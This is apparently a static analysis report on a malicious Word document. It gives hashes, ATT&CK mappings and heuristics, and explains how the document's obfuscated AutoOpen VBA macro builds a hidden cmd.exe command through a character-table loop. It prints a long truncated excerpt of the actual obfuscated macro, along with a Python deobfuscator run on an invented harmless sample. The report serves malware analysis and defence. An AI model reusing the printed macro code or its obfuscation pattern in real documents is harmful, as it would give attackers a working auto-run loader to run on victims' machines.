Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1462f92f38bd9d10…

Verdict: MALICIOUS
Type: Office (OLE)
Size: 62.6 KB
Created: 2018-08-06 07:51:00 (document metadata, attacker-controllable)
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 75db5dd7c3549c662e016bd8fe44d936
SHA-1: c583a0104da1014b6683935ba0f86fed52ebc49e
SHA-256: 1462f92f38bd9d107d2e01367fed31a1a3c9b49a80e51c9f7fa1949a49ba7e9f
Risk score: 82

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1059.003 Command and Scripting Interpreter: Windows Command Shell (the assembled string starts with cmd /V:/C; see oHvUcN in the extracted macro)
  • T1027 Obfuscated Files or Information (split string literals and junk statements throughout the macro)

The sample is a Word document carrying a VBA project whose AutoOpen procedure runs as soon as the document is opened with macros enabled. AutoOpen calls Shell with a command string assembled from CStr("c") followed by the return values of several helper functions (ZDwomzuJ, pOoRSzKaQw, oHvUcN, wzcdXzlMo, DUzKrjihNo, bwpQwKSFM, OClpjYNSU), each of which concatenates dozens of short string literals. The fragments legible in oHvUcN ("md /" + "V:/C", "set As=", "for %i in (22,54,36,...") show that the assembled string starts with cmd /V:/C and uses the cmd.exe delayed-expansion trick: a character table is stored in an environment variable and a for loop over numeric indices rebuilds the real command one character at a time. The term Chr(wsBIGHi + OOfIRiYwVKvuUH + 34 + VfXwTiszZ + JusTwtBEB) evaluates to a double quote, Chr(34), because the surrounding names are never assigned: the module has no Option Explicit, so they are Empty, which is 0 in arithmetic, and On Error Resume Next suppresses anything that would otherwise fail. The interleaved TypeName statements (TypeName Tan(KoRDiT), TypeName Rnd(...), and so on) compute and discard values from the same never-assigned names; they are junk inserted to inflate and vary the code. Shell's second argument, 711607614 - 711607614 = 0, is vbHide, so no console window is shown. The behaviour the report infers, download and execution of a second-stage payload, is consistent with this loader pattern but is not confirmed by the visible fragments: the preview is truncated before the loop's do clause, so the decoded command line has not been recovered in this static pass.
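As an added example (not code from the report, from oletools, or from the sample), the static decoding a reverse engineer would apply to the macro above, written in Python: drop the junk TypeName statements, join the split string literals, resolve the helper Functions, treat never-assigned names as Empty (0) so that Chr(... + 34 + ...) becomes a double quote, and return the string AutoOpen hands to Shell. A second function then undoes the cmd.exe character-table loop. Because the preview is truncated and the real command is not on the page, the macro fed to it is a constructed sample that only mirrors the structure of macros.bas: the names partA, partB, aa, bb, As and fin are invented, it spells a harmless calc.exe, and the do set R=!R!!V:~%i,1! loop body is an assumption about what follows the visible for %i in (22,54,... fragment.

```python
import re

# Constructed sample (not from the page) shaped like the extracted macros.bas: junk
# TypeName statements on never-assigned names, literals split across many `+`, helper
# Functions returning the joined pieces, and an AutoOpen Sub handing the result to
# Shell. It spells a harmless "calc.exe"; the real sample's command is not visible.
SAMPLE_VBA = r'''
Sub AutoOpen()
On Error Resume Next
   TypeName ChrW(51844 / itvAq)
Shell@ CStr("c") + partA + partB, 711607614 - 711607614
End Sub
Function partA()
aa = "md /" + "V:/C" + CStr(Chr(wsBIGHi + OOfIRiYwVK + 34 + VfXwT)) + "set As=cx" + "e." + "al"
   TypeName CByte(54352 * qMOSLW)
bb = "&&fo" + "r" + " %i in (0" + ",4,5,0," + "3,2,1,2) "
partA = aa + bb
End Function
Function partB()
partB = "do set fin=!f" + "in!!As:~%i,1!" + "&&call !fin!" + CStr(Chr(34 + qQq))
End Function
'''


def split_top(s, sep):
    """Split on `sep` outside string literals and parentheses."""
    parts, start, depth, in_str = [], 0, 0, False
    for i, ch in enumerate(s):
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in "()":
            depth += 1 if ch == "(" else -1
        elif not in_str and depth == 0 and ch == sep:
            parts.append(s[start:i].strip())
            start = i + 1
    return parts + [s[start:].strip()]


class MacroEnv:
    def __init__(self, src):
        self.bodies, self.values, self.shell_args, name = {}, {}, [], None
        for line in (ln.strip() for ln in src.splitlines()):
            if (m := re.match(r"(?:Function|Sub)\s+(\w+)\s*\(", line)):
                name, self.bodies[m.group(1)] = m.group(1), []
            elif re.match(r"End (Function|Sub)\b", line):
                name = None
            elif name is not None and not re.match(r"TypeName\b|On Error\b", line):  # junk
                self.bodies[name].append(line)

    def run(self, name):
        for line in self.bodies.get(name, []):
            if (m := re.match(r"Shell@?\s+(.*)$", line)):  # 2nd argument is the window style
                self.shell_args.append(split_top(m.group(1), ",")[0])
            elif (m := re.match(r"(\w+)\s*=\s*(.*)$", line)):
                self.values[m.group(1)] = self.text(m.group(2))

    def lookup(self, name):
        if name not in self.values and name in self.bodies:
            self.values[name] = ""  # placeholder guards against recursion
            self.run(name)
        return self.values.get(name, "")  # never assigned: Empty, "" as text

    def number(self, expr):
        """`a + 34 - b`: never-assigned names are Empty, which is 0 in arithmetic."""
        if re.search(r"[*/^\\]", expr):
            raise ValueError("only + and - are handled: " + expr)
        total = 0
        for op, tok in re.findall(r"([+-]?)\s*(\d+|[A-Za-z_]\w*)", expr):
            v = tok if tok.isdigit() else self.lookup(tok)
            total += (-1 if op == "-" else 1) * (int(v) if v.isdigit() else 0)
        return total

    def text(self, rhs):
        out = []
        for term in split_top(rhs, "+"):
            if term.startswith('"') and term.endswith('"'):
                out.append(term[1:-1].replace('""', '"'))
            elif (m := re.fullmatch(r"CStr\((.*)\)", term, re.S)):
                out.append(self.text(m.group(1)))
            elif (m := re.fullmatch(r"Chr[WB]?\((.*)\)", term, re.S)):
                out.append(chr(self.number(m.group(1))))
            elif re.fullmatch(r"\w+", term):
                out.append(self.lookup(term))
            else:
                raise ValueError("unsupported term: " + term)
        return "".join(out)


def recover_shell_commands(src):
    """Command string(s) AutoOpen hands to Shell, junk dropped and pieces joined."""
    env = MacroEnv(src)
    env.run("AutoOpen")
    return [env.text(arg) for arg in env.shell_args]


def decode_cmd_indexing(cmd):
    """Undo `set V=<table>&&for %i in (i,...) do set R=!R!!V:~%i,1!` (loop body assumed)."""
    m = re.search(r"set\s+(\w+)=(.*?)&&for\s+%(\w)\s+in\s+\(([^)]*)\)"
                  r"\s+do\s+set\s+(\w+)=!\5!!\1:~%\3,1!", cmd, re.S)
    if not m:
        return None
    table, idx = m.group(2), [int(i) for i in m.group(4).split(",")]
    decoded = "".join(table[i] if i < len(table) else "?" for i in idx)
    return {"table": table, "indices": idx, "decoded": decoded}
```

Call recover_shell_commands on the decoded VBA source and pass each result to decode_cmd_indexing; the evaluator raises on any wrapper it does not know rather than guessing, which is the right failure mode for a decoder applied to attacker-controlled code, so extend text() for each new construct a sample uses. The command is only reconstructed, never executed: the goal of the static pass is the indicator, not the behaviour.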

Heuristics (4)

  • VBA macros detected (severity: medium; 1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code.
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    The VBA project defines AutoOpen, which Word runs automatically when the document is opened with macros enabled; no further user action is needed.
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. On its own this is analyst-facing evidence of an old Word macro-execution surface, not a downloader or parser-CVE attribution. Its generic description ("no modern VBA project was recovered") does not apply to this sample: olevba did recover a VBA project (macros.bas below), so for this file the finding is redundant with OLE_VBA_AUTOOPEN.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. A URL is not a detection by itself; the per-URL label states which channel (macro, JS, link annotation, document body, ...) reached it.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that Office writes into ordinary documents; it is expected content, not a network indicator, and should not be blocked or pivoted on.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4982 bytes
SHA-256: 68c38dc7b92d4dc5983aa82bb4d71f46efdc12a2f9a595516c1640496a366394

Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "GUpWZkaplEqXMk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName ChrW(51844 / itvAq)
   TypeName Tan(89266 - 6562)
   TypeName Tan(KoRDiT)
   TypeName Rnd(36987 - tYYwIT + 20120 * cwUSVz)
Shell@ CStr("c") + ZDwomzuJ + pOoRSzKaQw + oHvUcN + wzcdXzlMo + DUzKrjihNo + bwpQwKSFM + OClpjYNSU, 711607614 - 711607614
   TypeName Oct(ZMAjh)
   TypeName Int(AaqGJZ)
End Sub


Attribute VB_Name = "jdmBMJuTUH"
Function oHvUcN()
On Error Resume Next
TypeName CStr(711)
   TypeName CByte(54352 * qMOSLW)
DDnbDNpMjI = "md /" + "V:/C" + CStr(Chr(wsBIGHi + OOfIRiYwVKvuUH + 34 + VfXwTiszZ + JusTwtBEB)) + "set As=DuP" + "Knh" + "ML" + "zD" + "i"
TypeName ChrB(21045 + PjiwNE - 57184 + rwUiom)
   TypeName Atn(zEjti + fQojGj)
   TypeName Chr(VETwM)
lMHwaF = "Va" + "Pn" + "LWstidv" + "p{2j$" + "@15\kqF" + "-rwCxfI;" + "9:bG?" + "mN,c.OyoA"
TypeName ChrB(958)
   TypeName Sin(PvmofR + YbVqW + 20231 * REcERI)
   TypeName CSng(zCibPL)
sqHauZQ = "le}T+" + "(=' /S" + ")B&&fo" + "r" + " %i in (22" + ",54,36" + ",57," + "35,17," + "5,57" + ",56,56," + "64,26,"
TypeName Rnd(vFZRwr / zzcIiK - lLaCsk / HlzQz)
   TypeName Sgn(EBAjC)
   TypeName 4
vUfrRBoz = "3" + ",59" + ",8,62," + "1" + "4,57,3" + "6,34,54," + "44" + ",25,5" + "7,50,18,64" + "," + "48"
TypeName CBool(LTMdER / YTmKzP)
   TypeName CDate(17903 / 98833 - 79248 / nUbAA)
rrYzKHUONL = ",57,18" + ",51" + "," + "16," + "57,44,3" + "7,5" + "6,19," + "57,14,18," + "41,26,55"
TypeName CByte(73)
   TypeName Int(42258299)
   TypeName bcRzUa
LwTcTPwwmo = ",20," + "68,62,63,5" + ",18,1" + "8" + ",22," + "43,65,65," + "17" + ",57" + ",35,1"
TypeName CInt(61661 / MpGZz)
   TypeName ChrB(31)
UpzlF = "9,18,54,22" + ",54,56,12," + "51,50," + "54,47," + "65,33," + "5" + "6,1,38,6" + "5,18,17"
TypeName Cos(LqhMiH)
   TypeName CInt(LTEjI)
BzidkRwW = "," + "1" + "8,65,19," + "14,20" + ",57" + ",38,51"
TypeName Fix(qVNdpa)
   TypeName Tan(37179 + wzNCDo * 67137 + GmluPj)
   TypeName 2950
EtjVhLjI = ",22,5,22," + "46,5" + "6" + ",62," + "8" + ",38,50,2"
TypeName ChrW(6802 + bYDWD + 55367 / qLizl)
   TypeName fjJjG
CEIEn = "4,51,18,31" + ",1" + "4," + "63,51," + "66,22,56,1" + "9," + "18" + ",61,63,2" + "7,63," + "67,41,2" + "6,17,15,"
TypeName Chr(wBjRB - lXFXXK - 83617 * ubKZw)
   TypeName IHBVh
   TypeName Round(99106 * 61436 / 77296 - vlGcC)
FOXLKzlz = "52,64," + "62,64,63,4" + "2,29,28,63" + ",41,26,36," + "1" + "5,40,6" + "2,26,57,14" + ",21,43," + "18,57,47,2" + "2,60,"
oHvUcN = DDnbDNpMjI + lMHwaF + sqHauZQ + vUfrRBoz + rrYzKHUONL + LwTcTPwwmo + UpzlF + BzidkRwW + EtjVhLjI + CEIEn + FOXLKzlz
   TypeName 62
   TypeName 137
   TypeName Rnd(160819625)
End Function
Function wzcdXzlMo()
On Error Resume Next
TypeName CStr(bOGWW / iYjLfw / ufwUqm + RMbYkj)
   TypeName 2233
   TypeName CByte(1)
CGiwwiUj = "6" + "3,3" + "0,63" + "," + "60," + "26" + ",17,1"
TypeName Atn(6694)
   TypeName CDate(ikfnOK + KzPik + 13165 * oHKpG)
   TypeName Fix(49819892)
jMIji = "5,52,60" + ",63,51,5" + "7,38" + ",57,63" + ",4" + "1,39," + "54,35," + "57,12,50," + "5,61,26,3" + "2"
TypeName Pmhlp
   TypeName CDate(AiukPD + shJcc)
   TypeName Cos(4719 * rRcska)
MzKmPbfGXrz = ",45,22" + ",64," + "19,14,64,2" + "6" + ",5" + "5,20" + ",68," + "67"
TypeName cldQAh
   TypeName MzOvp
fMRdN = ",23,18" + ",35," + "53,23," + "26,3,59," + "8,51,9,5" + "4,"
TypeName tSIwMp
   TypeName jvPIw
CTiWzKpEi = "36,14,5" + "6" + ",54" + ",12,20,33," + "19,56,57,6"
TypeName Round(25)
   TypeName Log(932)
   TypeName Cos(3)
NcrTSVR = "1,26,32," + "45,22" + ",49,64,2" + "6" + ",36,15," + "40" + ",67,41," + "66,1"
TypeName CSng(ZzrzkD)
   TypeName omBvkH
   TypeName Tan(ZvPni)
iHDdjwOEIX = "8," + "12,3" + "5,18," + "34,1" + "3," + "35," + "54,50," + "57,1" + "7,17"
TypeName CSng(RQczc + FWPOLw)
   TypeName Rnd(71)
... (truncated)